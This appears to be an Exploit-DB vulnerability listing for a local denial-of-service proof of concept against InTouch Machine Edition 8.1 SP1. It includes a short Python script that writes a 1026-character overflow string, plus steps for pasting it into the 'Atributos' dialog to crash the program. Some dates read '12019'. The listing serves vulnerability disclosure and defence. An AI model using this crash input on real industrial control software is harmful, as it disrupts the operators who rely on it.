InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)

vendor:

InTouch Machine Edition

by:

chuyreds

7.5

CVSS

HIGH

Denial of Service (DoS) Local

CWE

Product Name: InTouch Machine Edition

Affected Version From: 8.1 SP1

Affected Version To: 8.1 SP1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 Pro x64 es

12019

InTouch Machine Edition 8.1 SP1 – ‘Atributos’ Denial of Service (PoC)

The exploit allows an attacker to cause a denial of service (DoS) on the InTouch Machine Edition 8.1 SP1 software. By sending a specially crafted input, the attacker can trigger a buffer overflow, causing the software to crash and become unresponsive.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patches and updates provided by the vendor. Additionally, it is advised to restrict access to the affected software to trusted users only.

Source

Exploit-DB raw data:

# Exploit Title: InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 12019-11-16
# Vendor Homepage: https://on.wonderware.com/
# Software Link : https://on.wonderware.com/intouch-machine-edition
# Tested Version: 8.1 SP1
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# InTouch Machine Edition 8.1 SP1.py


# Steps to Produce the Local Buffer Overflow (SEH Unicode):
# 1.- Run python code: InTouch_Machine_Edition_8.1.py
# 2.- Open InTouch_Machine_Edition_8.1.txt and copy content to clipboard
# 3.- Open ITME v8.1 InTouch Machine Edition
# 4.- On Graficos slect Atributos
# 5.- Paste ClipBoard on "No Redibujar"/"Deshabilitados" and click on "Aceptar"
#!/usr/bin/env python


buffer = "\x41" * 1026
f = open ("InTouch_Machine_Edition_8.1.txt", "w")
f.write(buffer)
f.close()